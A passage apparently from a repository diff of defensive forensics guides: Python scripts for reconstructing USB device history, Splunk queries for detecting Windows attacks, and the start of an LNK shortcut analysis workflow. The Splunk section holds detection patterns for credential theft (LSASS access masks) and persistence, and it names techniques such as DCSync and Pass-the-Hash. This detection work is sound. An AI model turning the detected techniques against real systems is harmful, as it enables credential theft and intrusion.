        dev_match = re.search(r'(USBSTOR\\[^\s]+|USB\\VID_\w+&PID_\w+[^\s]*)', section)
        if dev_match:
            device_id = dev_match.group(1)
            usb_installs.append({
                'first_install': timestamp,
                'device_id': device_id
            })
            print(f"  {timestamp} | {device_id}")

print(f"\nTotal USB installations found: {len(usb_installs)}")
PYEOF

# Parse Windows Event Logs for USB events
# System log (parsed below): 20001, 20003 (UserPnp driver install); 10000, 10100 (DriverFrameworks-UserMode)
# DriverFrameworks-UserMode/Operational log: 2003, 2010, 2100, 2102
# Security log: 6416 (new external device recognized)
python3 << 'PYEOF'
import json
from evtx import PyEvtxParser

try:
    parser = PyEvtxParser("/cases/case-2024-001/usb/System.evtx")

    print("\n=== SYSTEM EVENT LOG USB EVENTS ===\n")
    for record in parser.records_json():
        data = json.loads(record['data'])
        event_id = data['Event']['System']['EventID']
        # EventID may be a bare number or an object carrying a '#text' member
        if isinstance(event_id, dict):
            event_id = event_id.get('#text')
        event_id = str(event_id)

        # USB device connection events
        if event_id in ('20001', '20003', '10000', '10100'):
            timestamp = data['Event']['System']['TimeCreated']['#attributes']['SystemTime']
            event_data = data['Event'].get('UserData', data['Event'].get('EventData', {}))
            print(f"  [{timestamp}] EventID {event_id}: {json.dumps(event_data, default=str)[:200]}")
except Exception as e:
    print(f"Error: {e}")
PYEOF
```
|
||||
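As a complement to the body search in Step 4, the device instance ID can also be read from the section header line itself. This is a hedged sketch: the header wording `Device Install (Hardware initiated) - <device id>` reflects the layout typically seen in `setupapi.dev.log`, the sample text is synthetic, and `first_installs` is a hypothetical helper name. SetupAPI timestamps are written in the system's local time, so they need a timezone adjustment before being compared with UTC sources.

```python
import re
from datetime import datetime

# Header line followed by the "Section start" line of the same section
HEADER_RE = re.compile(
    r'^>>>\s+\[Device Install \(Hardware initiated\) - (?P<device_id>[^\]]+)\]\s*\n'
    r'>>>\s+Section start (?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})',
    re.MULTILINE,
)


def first_installs(log_text: str) -> dict:
    """Map each USB device ID to its earliest install timestamp (local time)."""
    found = {}
    for m in HEADER_RE.finditer(log_text):
        device_id = m.group('device_id').strip()
        if not device_id.upper().startswith(('USBSTOR\\', 'USB\\VID_')):
            continue
        ts = datetime.strptime(m.group('ts'), '%Y/%m/%d %H:%M:%S')
        # Keep the earliest occurrence if a device appears more than once
        if device_id not in found or ts < found[device_id]:
            found[device_id] = ts
    return found


# Synthetic sample modeled on the typical section layout (not real evidence)
SAMPLE = (
    ">>>  [Device Install (Hardware initiated) - "
    "USBSTOR\\Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP\\0019E06B4521A2B0&0]\n"
    ">>>  Section start 2024/01/10 09:15:32.123\n"
    "<<<  Section end 2024/01/10 09:15:33.456\n"
)

if __name__ == '__main__':
    for dev, ts in first_installs(SAMPLE).items():
        print(ts.isoformat(), dev)
```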
|
||||
### Step 5: Build USB Activity Timeline and Report
|
||||
|
||||
```bash
# Compile all USB evidence into a unified timeline
python3 << 'PYEOF'
import json, csv

timeline = []

# Load USBSTOR data
with open('/cases/case-2024-001/analysis/usb_devices.json') as f:
    devices = json.load(f)

for device in devices:
    timeline.append({
        'timestamp': device['last_connected'],
        'source': 'USBSTOR Registry',
        'device': f"{device['vendor']} {device['product']}",
        'serial': device['serial'],
        'event': 'Last Connected',
        'detail': device.get('friendly_name', '')
    })

# Sort chronologically
timeline.sort(key=lambda x: x['timestamp'])

# Write timeline CSV
with open('/cases/case-2024-001/analysis/usb_timeline.csv', 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['timestamp', 'source', 'device', 'serial', 'event', 'detail'])
    writer.writeheader()
    writer.writerows(timeline)

print(f"USB Timeline: {len(timeline)} events written to usb_timeline.csv")

# Print summary
print("\n=== USB DEVICE SUMMARY ===")
for entry in timeline:
    print(f"  {entry['timestamp']} | {entry['device']} | {entry['serial'][:20]} | {entry['event']}")
PYEOF
```
|
||||
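The Step 5 script loads only the USBSTOR data. One way to fold in the SetupAPI first-install times is sketched below, assuming the record shapes used in Steps 2 and 4 (`last_connected`, `first_install`, `device_id`). The helper names and the `utc_offset_hours` parameter are hypothetical; the offset exists because registry last-write times are UTC while SetupAPI logs local time, and the correct value has to come from the system's timezone settings.

```python
from datetime import datetime, timedelta, timezone


def registry_ts(text: str) -> datetime:
    """Parse str(datetime) as written in Step 2 and return naive UTC."""
    dt = datetime.fromisoformat(text)
    if dt.tzinfo is not None:
        dt = dt.astimezone(timezone.utc).replace(tzinfo=None)
    return dt


def setupapi_ts(text: str, utc_offset_hours: float) -> datetime:
    """Convert a SetupAPI local timestamp to naive UTC."""
    local = datetime.strptime(text, '%Y/%m/%d %H:%M:%S')
    return local - timedelta(hours=utc_offset_hours)


def build_timeline(devices, installs, utc_offset_hours=0.0):
    """Merge both sources into one list sorted by UTC time."""
    events = []
    for d in devices:
        events.append({'timestamp_utc': registry_ts(d['last_connected']),
                       'source': 'USBSTOR Registry',
                       'event': 'Key last written',
                       'device': d['serial']})
    for i in installs:
        events.append({'timestamp_utc': setupapi_ts(i['first_install'], utc_offset_hours),
                       'source': 'SetupAPI',
                       'event': 'First install',
                       'device': i['device_id']})
    # Sort on datetime objects, not strings, because the two sources
    # use different textual formats
    return sorted(events, key=lambda e: e['timestamp_utc'])


if __name__ == '__main__':
    demo = build_timeline(
        [{'serial': '0019E06B4521A2B0&0', 'last_connected': '2024-01-18 14:30:00'}],
        [{'device_id': 'USBSTOR\\Disk&Ven_Kingston', 'first_install': '2024/01/10 09:15:32'}],
        utc_offset_hours=-5,  # example value only
    )
    for e in demo:
        print(e['timestamp_utc'].isoformat(), e['source'], e['event'])
```

Sorting parsed datetimes avoids the ordering errors that string comparison would introduce between `2024-01-18 ...` and `2024/01/10 ...` style timestamps.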
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|---------|-------------|
| USBSTOR | Registry key storing USB mass storage device identification and connection data |
| VID/PID | Vendor ID and Product ID identifying the USB device manufacturer and model |
| Device serial number | Identifier intended to be unique per device (some devices share serials or report none) |
| MountedDevices | Registry key mapping volume GUIDs and drive letters to physical devices |
| MountPoints2 | Per-user registry key showing which volumes a user accessed |
| SetupAPI log | Windows driver installation log recording first-time device connections |
| DeviceContainers | Registry key in SOFTWARE hive with device metadata and timestamps |
| EMDMgmt | Registry key tracking ReadyBoost-compatible devices with serial numbers and timestamps |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|------|---------|
| USB Forensic Tracker | Specialized tool for USB device history extraction |
| USBDeview | NirSoft tool listing all USB devices connected to a system |
| RegRipper (usbstor plugin) | Automated USB artifact extraction from registry hives |
| Registry Explorer | Interactive registry analysis for USB-related keys |
| KAPE | Automated collection of USB-related artifacts |
| Plaso/log2timeline | Timeline creation including USB connection events |
| FTK Imager | Forensic imaging including removable media |
| Velociraptor | Endpoint agent with USB device history hunting artifacts |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Data Exfiltration by Departing Employee**
|
||||
Extract USBSTOR entries to identify every USB storage device recorded on the system. Correlate device serial numbers with MountPoints2 to confirm which user accessed each device. Cross-reference the timestamps with file access logs and Jump List recent files, then check the USN journal for large file-copy patterns.
|
||||
|
||||
**Scenario 2: Unauthorized Device on Secure System**
|
||||
Audit all USBSTOR entries against the approved device list. Flag devices whose VID/PID does not match corporate-approved hardware, determine when each unauthorized device was first and last connected, and check whether any data was transferred.
|
||||
|
||||
**Scenario 3: Malware Delivery via USB**
|
||||
Identify the USB device connected just before malware execution (compare against Prefetch timestamps) and extract its serial number and vendor information. Check whether autorun was enabled for the device, and look for executables launched from the removable drive letter in Prefetch and ShimCache.
|
||||
|
||||
**Scenario 4: Tracking a Specific USB Drive Across Multiple Systems**
|
||||
Search for the same device serial number in USBSTOR across all forensic images. Build a map of which systems the drive was connected to and when, reconstruct the chronological path of the device through the organization, and correlate it with network share access logs.
|
||||
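Scenario 4 amounts to grouping USBSTOR records by serial number across hosts. A minimal sketch follows, assuming each host's inventory has the shape of the `usb_devices.json` output from Step 2; `track_serials` is a hypothetical helper, and skipping instance IDs whose second character is `&` relies on the heuristic that such IDs are generated by Windows and are therefore not comparable across systems.

```python
from collections import defaultdict


def track_serials(inventories: dict) -> dict:
    """Return serials seen on more than one host, with sorted sightings.

    inventories maps a host name to a list of device dicts that carry
    'serial' and 'last_connected' keys.
    """
    sightings = defaultdict(list)
    for host, devices in inventories.items():
        for dev in devices:
            instance_id = dev['serial']
            # Skip OS-generated IDs (heuristic): they differ per system
            if len(instance_id) > 1 and instance_id[1] == '&':
                continue
            serial = instance_id.rsplit('&', 1)[0].upper()
            sightings[serial].append((dev['last_connected'], host))
    return {
        serial: sorted(seen)
        for serial, seen in sightings.items()
        if len({host for _, host in seen}) > 1
    }


if __name__ == '__main__':
    demo = {
        'HOST-A': [{'serial': '0019E06B4521A2B0&0', 'last_connected': '2024-01-18 14:30:00'}],
        'HOST-B': [{'serial': '0019e06b4521a2b0&0', 'last_connected': '2024-01-12 08:00:00'}],
    }
    for serial, seen in track_serials(demo).items():
        print(serial, seen)
```

Sorting the sightings by timestamp gives a per-host ordering of each drive's last recorded connection, which can then be compared with network share access logs.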
|
||||
## Output Format
|
||||
|
||||
```
|
||||
USB Device History Analysis:
|
||||
System: DESKTOP-ABC123 (Windows 10 Pro)
|
||||
Total USB Storage Devices: 12
|
||||
Analysis Sources: USBSTOR, MountedDevices, MountPoints2, SetupAPI, Event Logs
|
||||
|
||||
Device Inventory:
|
||||
1. Kingston DataTraveler 3.0 (Serial: 0019E06B4521A2B0)
|
||||
First Connected: 2024-01-10 09:15:32 (SetupAPI)
|
||||
Last Connected: 2024-01-18 14:30:00 (USBSTOR)
|
||||
Drive Letter: E:
|
||||
User Access: suspect_user (MountPoints2)
|
||||
|
||||
2. WD My Passport (Serial: 575834314131363035)
|
||||
First Connected: 2024-01-15 20:00:00
|
||||
Last Connected: 2024-01-15 23:45:00
|
||||
Drive Letter: F:
|
||||
User Access: suspect_user
|
||||
|
||||
Suspicious Findings:
|
||||
- Kingston drive connected 15 times during investigation period
|
||||
- WD Passport connected only once, late evening (unusual hours)
|
||||
- Unknown device (VID_1234&PID_5678) connected 2024-01-17, no matching approved device
|
||||
|
||||
Timeline: /cases/case-2024-001/analysis/usb_timeline.csv
|
||||
```
|
||||
@@ -0,0 +1,279 @@
|
||||
---
|
||||
name: analyzing-windows-event-logs-in-splunk
|
||||
description: >
|
||||
Analyzes Windows Security, System, and Sysmon event logs in Splunk to detect authentication attacks,
|
||||
privilege escalation, persistence mechanisms, and lateral movement using SPL queries mapped to
|
||||
MITRE ATT&CK techniques. Use when SOC analysts need to investigate Windows-based threats,
|
||||
build detection queries, or perform forensic timeline analysis of Windows endpoints and domain controllers.
|
||||
domain: cybersecurity
|
||||
subdomain: soc-operations
|
||||
tags: [soc, splunk, windows-events, sysmon, event-logs, mitre-attack, active-directory]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Windows Event Logs in Splunk
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- SOC analysts investigate alerts related to Windows authentication, process execution, or AD changes
|
||||
- Detection engineers build SPL queries for Windows-based threat detection
|
||||
- Incident responders need forensic timelines of Windows endpoint or domain controller activity
|
||||
- Periodic threat hunting targets Windows-specific ATT&CK techniques
|
||||
|
||||
**Do not use** for Linux/macOS endpoint analysis or network-only investigations.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Splunk with Windows Event Log data ingested (sourcetype `WinEventLog:Security`, `WinEventLog:System`, `XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`)
|
||||
- Sysmon deployed on endpoints with SwiftOnSecurity or Olaf Hartong configuration
|
||||
- CIM data model acceleration for Endpoint and Authentication data models
|
||||
- Knowledge of Windows Security Event IDs and Sysmon event types
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Authentication Attack Detection
|
||||
|
||||
**Brute Force Detection (EventCode 4625 — Failed Logon):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4625
|
||||
| stats count, dc(TargetUserName) AS unique_users, values(TargetUserName) AS targeted_users
|
||||
by src_ip, Logon_Type, Status
|
||||
| where count > 20
|
||||
| eval attack_type = case(
|
||||
Logon_Type=3, "Network Brute Force",
|
||||
Logon_Type=10, "RDP Brute Force",
|
||||
Logon_Type=2, "Interactive Brute Force",
|
||||
1=1, "Other"
|
||||
)
|
||||
| eval status_meaning = case(
|
||||
Status="0xc000006d", "Bad Username or Password",
|
||||
Status="0xc000006a", "Incorrect Password (valid user)",
|
||||
Status="0xc0000234", "Account Locked Out",
|
||||
Status="0xc0000072", "Account Disabled",
|
||||
1=1, Status
|
||||
)
|
||||
| sort - count
|
||||
| table src_ip, attack_type, status_meaning, count, unique_users, targeted_users
|
||||
```
|
||||
|
||||
**Password Spray Detection:**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4625 Logon_Type=3
|
||||
| bin _time span=10m
|
||||
| stats dc(TargetUserName) AS unique_users, count AS total_attempts,
|
||||
values(TargetUserName) AS users_targeted by src_ip, _time
|
||||
| where unique_users > 10 AND total_attempts < unique_users * 3
|
||||
| eval spray_confidence = if(unique_users > 25, "HIGH", "MEDIUM")
|
||||
```
|
||||
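The spray heuristic in the query above (many distinct users, few attempts per user, within a fixed 10-minute bucket) can be prototyped offline before tuning thresholds in Splunk. The sketch below mirrors those thresholds in Python under stated assumptions: `detect_spray` is a hypothetical helper, and each event is a dict with `time` (epoch seconds), `src_ip`, and `user` keys rather than the Splunk field names.

```python
from collections import defaultdict


def detect_spray(events, window_seconds=600, min_users=10):
    """Flag (src_ip, window) pairs that look like password spraying."""
    buckets = defaultdict(list)
    for e in events:
        # Fixed windows aligned to the epoch, like `bin _time span=10m`
        start = int(e['time'] // window_seconds) * window_seconds
        buckets[(e['src_ip'], start)].append(e['user'])

    hits = []
    for (src_ip, start), users in sorted(buckets.items()):
        unique_users = len(set(users))
        total_attempts = len(users)
        # Many distinct users, but fewer than 3 attempts per user on average
        if unique_users > min_users and total_attempts < unique_users * 3:
            hits.append({
                'src_ip': src_ip,
                'window_start': start,
                'unique_users': unique_users,
                'total_attempts': total_attempts,
                'confidence': 'HIGH' if unique_users > 25 else 'MEDIUM',
            })
    return hits


if __name__ == '__main__':
    spray = [{'time': i, 'src_ip': '10.0.0.5', 'user': f'user{i}'} for i in range(12)]
    brute = [{'time': i, 'src_ip': '10.0.0.9', 'user': 'admin'} for i in range(50)]
    for hit in detect_spray(spray + brute):
        print(hit)
```

Because the windows are fixed rather than sliding, a spray that straddles a bucket boundary may be split across two windows and fall under the threshold in both.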
|
||||
**Successful Logon After Failures (Compromise Indicator):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security"
|
||||
(EventCode=4625 OR EventCode=4624) src_ip!="127.0.0.1"
|
||||
| sort _time
|
||||
| stats earliest(_time) AS first_seen, latest(_time) AS last_seen,
|
||||
sum(eval(if(EventCode=4625,1,0))) AS failures,
|
||||
sum(eval(if(EventCode=4624,1,0))) AS successes
|
||||
by src_ip, TargetUserName, ComputerName
|
||||
| where failures > 10 AND successes > 0
|
||||
| eval time_to_success = round((last_seen - first_seen)/60, 1)
|
||||
| sort - failures
|
||||
```
|
||||
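The query above counts failures and successes per source, user, and host, but `stats` does not check that the success came after the failures. When ordering matters, the matched events can be post-processed. The sketch below shows one way to do that in Python; `success_after_failures` is a hypothetical helper and the event dict keys (`time`, `event_code`, `src_ip`, `user`, `host`) are assumed names, not Splunk fields.

```python
def success_after_failures(events, min_failures=10):
    """Report successful logons that directly follow a run of failures."""
    streak = {}      # (src_ip, user, host) -> consecutive failure count
    findings = []
    for e in sorted(events, key=lambda ev: ev['time']):
        key = (e['src_ip'], e['user'], e['host'])
        if e['event_code'] == 4625:
            streak[key] = streak.get(key, 0) + 1
        elif e['event_code'] == 4624:
            # A success ends the streak; report it if the run was long enough
            failures = streak.pop(key, 0)
            if failures > min_failures:
                findings.append({
                    'src_ip': e['src_ip'],
                    'user': e['user'],
                    'host': e['host'],
                    'failures_before_success': failures,
                    'success_time': e['time'],
                })
    return findings


if __name__ == '__main__':
    base = {'src_ip': '192.168.1.105', 'user': 'jdoe', 'host': 'WORKSTATION-042'}
    demo = [dict(base, time=t, event_code=4625) for t in range(11)]
    demo.append(dict(base, time=11, event_code=4624))
    print(success_after_failures(demo))
```

Resetting the counter on every success means a legitimate logon early in the day does not combine with unrelated failures hours later.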
|
||||
### Step 2: Privilege Escalation Detection
|
||||
|
||||
**New Admin Account Created (T1136.001):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4720
|
||||
| join type=inner TargetUserName [
|
||||
search index=wineventlog EventCode=4732 TargetUserName="Administrators"
|
||||
| rename MemberName AS TargetUserName
|
||||
]
|
||||
| table _time, SubjectUserName, TargetUserName, ComputerName
|
||||
| eval alert = "New account created and added to Administrators group"
|
||||
```
|
||||
|
||||
**Special Privileges Assigned (EventCode 4672):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4672
|
||||
SubjectUserName!="SYSTEM" SubjectUserName!="LOCAL SERVICE" SubjectUserName!="NETWORK SERVICE"
|
||||
| stats count, values(PrivilegeList) AS privileges by SubjectUserName, ComputerName
|
||||
| where count > 0
|
||||
| search privileges IN ("SeDebugPrivilege", "SeTcbPrivilege", "SeBackupPrivilege",
|
||||
"SeRestorePrivilege", "SeAssignPrimaryTokenPrivilege")
|
||||
```
|
||||
|
||||
**Token Manipulation Detection (T1134):**
|
||||
```spl
|
||||
index=sysmon EventCode=10 TargetImage="*\\lsass.exe"
|
||||
GrantedAccess IN ("0x1010", "0x1038", "0x1fffff", "0x40")
|
||||
| stats count by SourceImage, SourceUser, Computer, GrantedAccess
|
||||
| where NOT match(SourceImage, "(svchost|csrss|wininit|MsMpEng|CrowdStrike)")
|
||||
| sort - count
|
||||
```
|
||||
|
||||
### Step 3: Persistence Mechanism Detection
|
||||
|
||||
**Scheduled Task Creation (T1053.005):**
|
||||
```spl
|
||||
index=wineventlog (sourcetype="WinEventLog:Security" EventCode=4698)
|
||||
OR (sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
|
||||
Image="*\\schtasks.exe")
|
||||
| eval task_info = coalesce(TaskContent, CommandLine)
|
||||
| search task_info="*powershell*" OR task_info="*cmd*" OR task_info="*http*" OR task_info="*\\Temp\\*"
|
||||
| table _time, Computer, SubjectUserName, TaskName, task_info
|
||||
```
|
||||
|
||||
**Registry Run Key Modification (T1547.001):**
|
||||
```spl
|
||||
index=sysmon EventCode=13
|
||||
TargetObject IN (
|
||||
"*\\CurrentVersion\\Run\\*",
|
||||
"*\\CurrentVersion\\RunOnce\\*",
|
||||
"*\\CurrentVersion\\RunServices\\*",
|
||||
"*\\Explorer\\Shell Folders\\*"
|
||||
)
|
||||
| stats count by Computer, Image, TargetObject, Details
|
||||
| where NOT match(Image, "(explorer\.exe|msiexec\.exe|setup\.exe)")
|
||||
| sort - count
|
||||
```
|
||||
|
||||
**WMI Event Subscription (T1546.003):**
|
||||
```spl
|
||||
index=sysmon (EventCode=20 OR EventCode=21)
|
||||
| stats count by Computer, Operation, Consumer, EventNamespace
|
||||
| where count > 0
|
||||
```
|
||||
|
||||
### Step 4: Lateral Movement Detection
|
||||
|
||||
**Remote Service Exploitation (T1021.002 — SMB/Windows Admin Shares):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 Logon_Type=3
|
||||
| stats dc(ComputerName) AS unique_destinations, values(ComputerName) AS targets
|
||||
by src_ip, TargetUserName
|
||||
| where unique_destinations > 3
|
||||
| sort - unique_destinations
|
||||
| table src_ip, TargetUserName, unique_destinations, targets
|
||||
```
|
||||
|
||||
**PsExec Detection (T1021.002):**
|
||||
```spl
|
||||
index=sysmon EventCode=1
|
||||
(Image="*\\psexec.exe" OR Image="*\\psexesvc.exe"
|
||||
OR ParentImage="*\\psexesvc.exe"
|
||||
OR OriginalFileName="psexec.c")
|
||||
| table _time, Computer, User, ParentImage, Image, CommandLine
|
||||
```
|
||||
|
||||
**RDP Lateral Movement (T1021.001):**
|
||||
```spl
|
||||
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 Logon_Type=10
|
||||
| stats count, dc(ComputerName) AS rdp_targets, values(ComputerName) AS destinations
|
||||
by src_ip, TargetUserName
|
||||
| where rdp_targets > 2
|
||||
| sort - rdp_targets
|
||||
```
|
||||
|
||||
### Step 5: Build Forensic Timeline
|
||||
|
||||
Create a comprehensive timeline for a compromised host:
|
||||
|
||||
```spl
|
||||
(index=wineventlog OR index=sysmon) Computer="WORKSTATION-042"
|
||||
earliest="2024-03-14T00:00:00" latest="2024-03-16T00:00:00"
|
||||
| eval event_description = case(
|
||||
EventCode=4624, "Logon: ".TargetUserName." (Type ".Logon_Type.")",
|
||||
EventCode=4625, "Failed Logon: ".TargetUserName,
|
||||
EventCode=4688 OR (like(sourcetype, "XmlWinEventLog:%Sysmon%") AND EventCode=1),
|
||||
"Process: ".Image." CMD: ".CommandLine,
|
||||
EventCode=4698, "Scheduled Task: ".TaskName,
|
||||
EventCode=3, "Network: ".DestinationIp.":".DestinationPort,
|
||||
EventCode=11, "File Created: ".TargetFilename,
|
||||
EventCode=13, "Registry: ".TargetObject,
|
||||
1=1, "Event ".EventCode
|
||||
)
|
||||
| sort _time
|
||||
| table _time, EventCode, event_description, User, src_ip
|
||||
```
|
||||
|
||||
### Step 6: Create Lookup Tables for Enrichment
|
||||
|
||||
Build reference lookups for Windows Event ID context:
|
||||
|
||||
```spl
|
||||
| inputlookup windows_eventcode_lookup.csv
|
||||
| table EventCode, Description, ATT_CK_Technique, Severity
|
||||
```
|
||||
|
||||
If the lookup doesn't exist, create it:
|
||||
|
||||
```csv
|
||||
EventCode,Description,ATT_CK_Technique,Severity
|
||||
4624,Successful Logon,T1078,Informational
|
||||
4625,Failed Logon,T1110,Low
|
||||
4648,Explicit Credential Logon,T1078,Medium
|
||||
4672,Special Privileges Assigned,T1134,Medium
|
||||
4688,New Process Created,T1059,Informational
|
||||
4698,Scheduled Task Created,T1053.005,Medium
|
||||
4720,User Account Created,T1136.001,High
|
||||
4732,Member Added to Security Group,T1098,High
|
||||
4768,Kerberos TGT Requested,T1558,Informational
|
||||
4769,Kerberos Service Ticket,T1558.003,Low
|
||||
4771,Kerberos Pre-Auth Failed,T1110,Low
|
||||
```
|
||||
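To check the lookup contents before uploading the file to Splunk, the same enrichment can be reproduced locally. This is an illustrative sketch only: `load_lookup` and `enrich` are hypothetical helpers, and the embedded CSV is a three-row excerpt of the table above.

```python
import csv
import io

# Excerpt of the lookup rows listed above
LOOKUP_CSV = """EventCode,Description,ATT_CK_Technique,Severity
4624,Successful Logon,T1078,Informational
4625,Failed Logon,T1110,Low
4720,User Account Created,T1136.001,High
"""


def load_lookup(text: str) -> dict:
    """Index lookup rows by EventCode (kept as a string key)."""
    return {row['EventCode']: row for row in csv.DictReader(io.StringIO(text))}


def enrich(event: dict, lookup: dict) -> dict:
    """Return a copy of the event with lookup fields added."""
    row = lookup.get(str(event.get('EventCode')), {})
    return {
        **event,
        'Description': row.get('Description', 'Unknown'),
        'ATT_CK_Technique': row.get('ATT_CK_Technique', ''),
        'Severity': row.get('Severity', ''),
    }


if __name__ == '__main__':
    lookup = load_lookup(LOOKUP_CSV)
    print(enrich({'EventCode': 4720, 'Computer': 'WORKSTATION-042'}, lookup))
```

Keying on the string form of `EventCode` avoids mismatches between numeric event fields and the text values read from the CSV.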
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|-----------|
| **EventCode 4624** | Successful logon event: Logon_Type 2 (interactive), 3 (network), 7 (unlock), 10 (RDP) |
| **EventCode 4625** | Failed logon event: the Status code indicates the failure reason (bad password, account locked, disabled) |
| **Sysmon EventCode 1** | Process creation with full command line, parent process, and hash information |
| **Sysmon EventCode 3** | Network connection initiated by a process, with source/destination IP, port, and process context |
| **Logon Type 3** | Network logon (SMB, WMI, PowerShell Remoting); key indicator of lateral movement |
| **Logon Type 10** | Remote interactive logon via RDP/Terminal Services |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Enterprise**: SIEM platform with SPL query engine for Windows event log analysis and correlation
|
||||
- **Sysmon (System Monitor)**: Microsoft Sysinternals tool providing detailed process, network, and file activity logging
|
||||
- **Splunk CIM**: Common Information Model mapping Windows events to normalized fields for cross-source queries
|
||||
- **Windows Event Forwarding (WEF)**: Built-in Windows mechanism for centralizing event logs to a collector server
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
- **Kerberoasting (T1558.003)**: Detect EventCode 4769 with encryption type 0x17 (RC4) for non-standard service accounts
|
||||
- **DCSync (T1003.006)**: Detect EventCode 4662 with DS-Replication-Get-Changes from non-DC sources
|
||||
- **Golden Ticket (T1558.001)**: Detect EventCode 4769 with abnormal ticket properties (long lifetime, non-standard encryption)
|
||||
- **Pass-the-Hash (T1550.002)**: Detect EventCode 4624 Logon_Type 3 with NTLM authentication from unexpected sources
|
||||
- **DLL Side-Loading (T1574.002)**: Sysmon EventCode 7 showing unsigned DLLs loaded by legitimate processes
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
WINDOWS EVENT LOG ANALYSIS — HOST: WORKSTATION-042
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Period: 2024-03-14 to 2024-03-15
|
||||
Events: 12,847 total (Security: 9,231 | Sysmon: 3,616)
|
||||
|
||||
Authentication Summary:
|
||||
Successful Logons (4624): 487 (Type 3: 312, Type 10: 45, Type 2: 130)
|
||||
Failed Logons (4625): 847 (from 192.168.1.105 — BRUTE FORCE)
|
||||
Explicit Creds (4648): 12
|
||||
|
||||
Suspicious Findings:
|
||||
[HIGH] 847 failed logons followed by success at 14:35 from 192.168.1.105
|
||||
[HIGH] New user "backdoor_admin" created (4720) at 14:38
|
||||
[HIGH] User added to Administrators group (4732) at 14:38
|
||||
[MEDIUM] schtasks.exe creating persistence task at 14:42
|
||||
[MEDIUM] PowerShell encoded command execution at 14:45
|
||||
|
||||
ATT&CK Mapping:
|
||||
T1110.001 — Password Guessing (847 failed logons)
|
||||
T1136.001 — Local Account Creation (backdoor_admin)
|
||||
T1053.005 — Scheduled Task (persistence)
|
||||
T1059.001 — PowerShell (encoded execution)
|
||||
```
|
||||
@@ -0,0 +1,310 @@
|
||||
---
|
||||
name: analyzing-windows-lnk-files-for-artifacts
|
||||
description: Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers for forensic timeline reconstruction.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, lnk-files, windows-artifacts, shortcut-analysis, timeline-reconstruction, evidence-collection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Windows LNK Files for Artifacts
|
||||
|
||||
## When to Use
|
||||
- When reconstructing user file access history from Windows shortcut files
|
||||
- For tracking accessed files, network shares, and removable media
|
||||
- During investigations to prove a user opened specific documents
|
||||
- When correlating file access with other timeline artifacts
|
||||
- For identifying accessed paths on remote systems or USB devices
|
||||
|
||||
## Prerequisites
|
||||
- Access to LNK files from forensic image (Recent, Desktop, Quick Launch)
|
||||
- LECmd (Eric Zimmerman), python-lnk, or LnkParser for analysis
|
||||
- Understanding of LNK file structure (Shell Link Binary format)
|
||||
- Knowledge of LNK file locations on Windows systems
|
||||
- Forensic workstation with analysis tools installed
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Collect LNK Files from Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount forensic image
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
mkdir -p /cases/case-2024-001/lnk/{recent,desktop,startup,custom}
|
||||
|
||||
# Copy Recent items LNK files (primary source)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/*.lnk \
|
||||
/cases/case-2024-001/lnk/recent/ 2>/dev/null
|
||||
|
||||
# Copy automatic destinations (Jump Lists)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/AutomaticDestinations/*.automaticDestinations-ms \
|
||||
/cases/case-2024-001/lnk/recent/ 2>/dev/null
|
||||
|
||||
# Copy custom destinations (pinned Jump List items)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations/*.customDestinations-ms \
|
||||
/cases/case-2024-001/lnk/custom/ 2>/dev/null
|
||||
|
||||
# Copy Desktop shortcuts
|
||||
cp /mnt/evidence/Users/*/Desktop/*.lnk /cases/case-2024-001/lnk/desktop/ 2>/dev/null
|
||||
|
||||
# Copy Startup folder shortcuts (persistence)
|
||||
cp /mnt/evidence/Users/*/AppData/Roaming/Microsoft/Windows/Start\ Menu/Programs/Startup/*.lnk \
|
||||
/cases/case-2024-001/lnk/startup/ 2>/dev/null
|
||||
cp "/mnt/evidence/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"/*.lnk \
|
||||
/cases/case-2024-001/lnk/startup/ 2>/dev/null
|
||||
|
||||
# Find all LNK files on the system
|
||||
find /mnt/evidence/ -name "*.lnk" -type f 2>/dev/null > /cases/case-2024-001/lnk/all_lnk_locations.txt
|
||||
|
||||
# Count and hash
|
||||
ls /cases/case-2024-001/lnk/recent/ | wc -l
|
||||
